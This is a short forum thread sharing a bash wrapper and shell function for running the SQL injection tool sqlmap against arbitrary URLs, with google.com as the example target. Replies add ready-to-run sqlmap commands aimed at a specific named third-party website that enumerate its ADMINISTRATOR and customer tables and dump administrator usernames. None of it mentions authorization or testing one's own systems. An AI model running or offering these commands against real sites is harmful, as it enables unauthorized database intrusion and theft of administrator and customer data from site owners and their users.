SQLMap Bash RC Function & Run Command For Linux
Page 1 of 1 • Share •
SQLMap Bash RC Function & Run Command For Linux
Install
- Code:
sudo apt install -y sqlmap
- Code:
#!/bin/bash
# Example: ./run.sh target.com
#
# Site: github.com/sqlmapproject/sqlmap
#
var="$1"
if [ ! -d "sqlmap" ]; then
git clone https://github.com/sqlmapproject/sqlmap.git
fi
#
cd sqlmap
python sqlmap.py -u $var
Bash RC Function
- Code:
function mapscan(){
cd /home/jay/Documents/Scripts/SQLMap/
bash run.sh $1
}
Example:
- Code:
mapscan google.com
Re: SQLMap Bash RC Function & Run Command For Linux
More commands:
So inside run.sh would be the line
- Code:
sqlmap --wizard --time-sec 10 -u $1 --dbs --tamper
So inside run.sh would be the line
- Code:
python sqlmap.py --wizard --time-sec 10 -u $var --dbs # --tamper
Re: SQLMap Bash RC Function & Run Command For Linux
Other commands to play with
Integrate this into the function if you want to!
- Code:
sqlmap -u www.gba-corona.com/news.php?id=6 --D cif1 -T ADMINISTRATOR --columns
sqlmap -u www.gba-corona.com/news.php?id=6 --D cif1 -T cif_customer --columns
sqlmap -u www.gba-corona.com/news.php?id=6 -D cif1 -T ADMINISTRATOR -C username --dump
Integrate this into the function if you want to!

» How to install Selenium RC on Linux fedora
» Linux Based Stable Solution for VoIP Business!!
» Can any one suggest what command could be used for refreshing a page using c sharp
» Linux based VoIP Switch with Integrated Billing only $2/port
» Verify command when used with Java,JUNIT and Eclipse
» Linux Based Stable Solution for VoIP Business!!
» Can any one suggest what command could be used for refreshing a page using c sharp
» Linux based VoIP Switch with Integrated Billing only $2/port
» Verify command when used with Java,JUNIT and Eclipse
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum